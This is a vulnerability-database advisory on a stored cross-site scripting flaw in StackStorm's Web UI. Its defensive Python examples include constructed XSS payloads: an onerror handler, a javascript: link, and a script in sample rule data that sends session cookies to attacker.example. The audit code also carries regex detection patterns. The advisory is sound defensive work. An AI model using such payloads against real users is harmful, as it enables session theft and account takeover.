CVE-2022-43706: Stored cross-site scripting in the StackStorm Web UI (versions prior to 3.8.0)
Cross-site scripting (XSS) vulnerability in the Web UI of StackStorm versions prior to 3.8.0 allowed logged in users with write access to pack rules to inject arbitrary script or HTML that may be executed in Web UI for other logged in users.
AI Analysis
Technical Summary
CVE-2022-43706 is a cross-site scripting (XSS) vulnerability in the Web UI of StackStorm, an event-driven automation and workflow orchestration platform. It affects versions prior to 3.8.0. Rules are the pack objects that bind a trigger to an action through matching criteria, and the Web UI renders rule fields (names, descriptions, action parameters) for every user who browses them. A logged-in user with write access to pack rules can place arbitrary HTML or script in a rule; because the value is stored server-side and rendered without adequate output encoding, the payload executes in the browser of any other logged-in user who views that rule in the Web UI. This is therefore a stored XSS (CWE-79), not a reflected one: the attacker does not need to send the victim a crafted link, only to save a rule. In the victim's browser the script runs under the victim's session, so it can read whatever the victim can see and call the StackStorm API with the victim's privileges, for example to create or modify further rules or execute actions. The CVSS v3.1 base score is 5.4 (medium): network attack vector, low attack complexity, low privileges required (an account that can write rules), user interaction required (the victim must view the rule in the Web UI), scope changed (the injected code runs in the viewer's browser, outside the vulnerable server component) and low confidentiality and integrity impact. No exploitation in the wild has been reported. The vendor description names 3.8.0 as the fixed version; the source record carries no further vendor product details. Exposure is greatest where several users hold rule write permissions and share one Web UI.
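To make the stored-XSS mechanism concrete, the following added example (not code from StackStorm or st2web) models the two rendering paths: a rule description concatenated straight into HTML, which is the pattern the vulnerable Web UI effectively followed, beside the escaped form. The rule objects are constructed, and the render functions and the `fetch` call inside the payload are illustrative assumptions, not the project's API.

```python
"""Stored XSS through a rule field: unsafe vs. escaped rendering.

Added example, not StackStorm/st2web code. A rule saved by one user is
later rendered into HTML for another user; the only difference between the
two paths below is output encoding.
"""
from __future__ import annotations

import html
from html.parser import HTMLParser

# Constructed rule objects. The attacker only needs rule write access; the
# payload sits in a free-text field that the Web UI displays to everyone.
# (The fetch() target is illustrative; the point is that it runs as the viewer.)
MALICIOUS_RULE = {
    "ref": "examples.evil_rule",
    "description": "<img src=x onerror=\"fetch('/api/v1/rules')\">",
}
BENIGN_RULE = {"ref": "examples.hello", "description": "Greet on webhook"}


def render_unsafe(rule: dict) -> str:
    """Vulnerable pattern: field values interpolated into markup verbatim."""
    return f'<li class="rule">{rule["ref"]}: {rule["description"]}</li>'


def render_safe(rule: dict) -> str:
    """Hardened pattern: escape for the HTML text context before interpolating.

    quote=True also neutralises " and ', so the same helper is safe when the
    value lands inside a quoted attribute.
    """
    ref = html.escape(rule["ref"], quote=True)
    desc = html.escape(rule["description"], quote=True)
    return f'<li class="rule">{ref}: {desc}</li>'


class _TagCollector(HTMLParser):
    """Records every start tag a browser-like parser would create."""

    def __init__(self) -> None:
        super().__init__()
        self.tags: list[tuple[str, dict]] = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parsed_tags(fragment: str) -> list[tuple[str, dict]]:
    """Parse a rendered fragment and return (tag, attributes) pairs."""
    parser = _TagCollector()
    parser.feed(fragment)
    parser.close()
    return parser.tags


def has_event_handler(fragment: str) -> bool:
    """True if any parsed element carries an on* attribute, i.e. script
    would run when the browser processes this fragment."""
    return any(
        name.startswith("on") for _, attrs in parsed_tags(fragment) for name in attrs
    )


if __name__ == "__main__":
    for label, render in (("unsafe", render_unsafe), ("safe", render_safe)):
        out = render(MALICIOUS_RULE)
        print(f"{label}: tags={[t for t, _ in parsed_tags(out)]} "
              f"event_handler={has_event_handler(out)}")
```

The unsafe path yields an `img` element with an `onerror` handler, so the viewer's browser executes the payload; the escaped path yields only the `li` wrapper and the payload is shown as inert text. Both paths produce identical output for the benign rule, which is why this class of bug goes unnoticed until someone stores markup.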
Potential Impact
For European organizations running StackStorm, particularly for critical automation, the risk is script execution inside the Web UI session of another user. An attacker who already holds rule write access saves a rule carrying a payload; when a colleague opens the rules view, the script runs with that colleague's session and can call the StackStorm API as them. If the viewer is an administrator, that is the privilege escalation path: the attacker's script can create or enable rules, run actions, or read sensitive configuration (such as API keys or datastore values) that the attacker's own account could not. Automation workflows may be silently altered, operations disrupted and configuration data exposed. Finance, manufacturing, telecommunications and critical infrastructure operators that orchestrate with StackStorm are the most exposed. The medium score reflects that an unauthenticated attacker cannot use this directly and that the victim has to view the rule; within a shared automation team, however, browsing rules is routine, so the user-interaction condition is easily met. No public exploitation has been reported, which lowers immediate risk but does not remove it in environments where many operators share rule write permissions.
Mitigation Recommendations
To mitigate this vulnerability, European organizations should:
1) Upgrade StackStorm to 3.8.0 or later, the first version in which the Web UI rendering is fixed.
2) Until the upgrade lands, reduce who can create or modify rules. With StackStorm's RBAC enabled, grant the rule_create and rule_modify permission types only to roles that genuinely need them and give everyone else rule_view; without RBAC every authenticated user can write rules, so the practical control is to keep the set of accounts small.
3) Input validation and output encoding belong in the Web UI itself and are what 3.8.0 changes; an operator cannot bolt them onto a running deployment. What an operator can do is treat existing rule definitions as untrusted data: export them (st2 rule list, st2 rule get <ref>) and look for HTML tags, inline event handlers or javascript: URIs in names, descriptions, criteria and action parameters, then delete or rewrite anything that is not plain text. Repeat this after upgrading as well, since the upgrade changes how fields are rendered but leaves injected payloads stored.
4) Monitor rule changes: rule create and update requests go through the /api/v1/rules endpoint, so alert on writes there from unexpected accounts and diff rule definitions over time.
5) Tell Web UI users to report unexpected behaviour (redirects, prompts, rules they did not create), which is how this class of bug usually surfaces.
6) Restrict Web UI and API access to trusted networks or a VPN; this does not stop an insider who already has rule write access, but it limits the pool of accounts that can be phished or abused.
7) A WAF with XSS rules in front of the StackStorm API can add detection, but treat it as defence in depth: the injection travels in authenticated API calls that the st2 CLI also makes, so blocking rules need tuning, and encoding-based bypasses of generic XSS signatures are routine.
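The audit of stored rule definitions recommended above can be scripted. The following added example (not StackStorm project code) walks every string field of exported rules and flags values that look like markup or script. It assumes that `st2 rule list -j` prints rule objects as a JSON array (the `-j` flag and the exact field set are assumptions); the three sample rules embedded below are constructed and trimmed to the fields the Web UI displays.

```python
"""Audit StackStorm rule definitions for HTML or script content.

Added example, not StackStorm project code. It takes the JSON printed by
`st2 rule list -j` (flag assumed; `st2 rule get <ref> -j` for one rule),
walks every string field, and reports values that look like markup or
script, so an operator still on a pre-3.8.0 deployment can find rules that
would execute in other users' browsers and, after upgrading, can clean out
payloads that persist as data. The sample rules below are constructed.
"""
import json
import re
import sys

# Indicators of active content; a plain-text rule field should hit none.
MARKUP_PATTERNS = {
    "html_tag": re.compile(r"<\s*[a-zA-Z!/]"),
    "event_handler": re.compile(r"\bon[a-z]+\s*=", re.I),
    "script_uri": re.compile(r"javascript\s*:", re.I),
    "char_reference": re.compile(r"&#x?[0-9a-f]+;", re.I),
}

# Constructed sample: one benign rule and two carrying payloads.
SAMPLE_RULES_JSON = """
[
  {
    "ref": "examples.notify_on_pr",
    "pack": "examples",
    "name": "notify_on_pr",
    "description": "Post to chat when a pull request opens",
    "enabled": true,
    "trigger": {"type": "core.st2.webhook", "parameters": {"url": "github"}},
    "criteria": {"trigger.body.action": {"type": "equals", "pattern": "opened"}},
    "action": {"ref": "chatops.post_message",
               "parameters": {"message": "New PR: {{ trigger.body.title }}"}}
  },
  {
    "ref": "examples.evil_description",
    "pack": "examples",
    "name": "evil_description",
    "description": "<script>document.location='https://attacker.example/?c='+document.cookie</script>",
    "enabled": true,
    "trigger": {"type": "core.st2.IntervalTimer", "parameters": {"unit": "seconds", "delta": 60}},
    "criteria": {},
    "action": {"ref": "core.noop", "parameters": {}}
  },
  {
    "ref": "examples.evil_parameter",
    "pack": "examples",
    "name": "evil_parameter",
    "description": "Looks harmless",
    "enabled": false,
    "trigger": {"type": "core.st2.webhook", "parameters": {"url": "deploy"}},
    "criteria": {},
    "action": {"ref": "core.echo",
               "parameters": {"message": "<a href='javascript:alert(document.domain)'>report</a>"}}
  }
]
"""


def load_sample_rules() -> list:
    """Constructed rules used when no file is given on the command line."""
    return json.loads(SAMPLE_RULES_JSON)


def walk_strings(node, path=""):
    """Yield (dotted_path, value) for every string anywhere in a JSON tree."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk_strings(value, f"{path}.{key}" if path else key)
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk_strings(value, f"{path}[{index}]")
    elif isinstance(node, str):
        yield path, node


def audit_rules(rules: list) -> list:
    """Return one finding per (rule, field) whose value matches an indicator."""
    findings = []
    for rule in rules:
        ref = rule.get("ref") or f"{rule.get('pack')}.{rule.get('name')}"
        for path, value in walk_strings(rule):
            for label, pattern in MARKUP_PATTERNS.items():
                if pattern.search(value):
                    findings.append({"ref": ref, "field": path,
                                     "indicator": label, "value": value[:80]})
                    break  # one finding per field is enough for triage
    return findings


def main(argv: list) -> int:
    if len(argv) > 1:
        with open(argv[1], encoding="utf-8") as fh:
            rules = json.load(fh)
    else:
        rules = load_sample_rules()
    findings = audit_rules(rules)
    for f in findings:
        print(f"{f['ref']}\t{f['field']}\t{f['indicator']}\t{f['value']!r}")
    # Non-zero exit lets the check fail a scheduled job or CI pipeline.
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Run it as `python audit_rules.py rules.json` after exporting with `st2 rule list -j > rules.json`, or with no argument to see it flag the two constructed payload rules. The indicators are deliberately broad (a description containing "only=" will trip the event-handler check), because a false positive costs a glance while a missed payload costs a session; tune the patterns rather than narrowing the field list, since criteria and action parameters are rendered just as descriptions are.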
Affected Countries
Germany, France, United Kingdom, Netherlands, Sweden, Finland, Belgium, Italy
Technical Details
- Data Version: 5.1
- Assigner Short Name: mitre
- Date Reserved: 2022-10-24T00:00:00.000Z
- CISA Enriched: true
Threat ID: 682d9840c4522896dcbf1385
Added to database: 5/21/2025, 9:09:20 AM
Last enriched: 6/24/2025, 3:41:44 AM
Last updated: 7/26/2025, 4:52:47 AM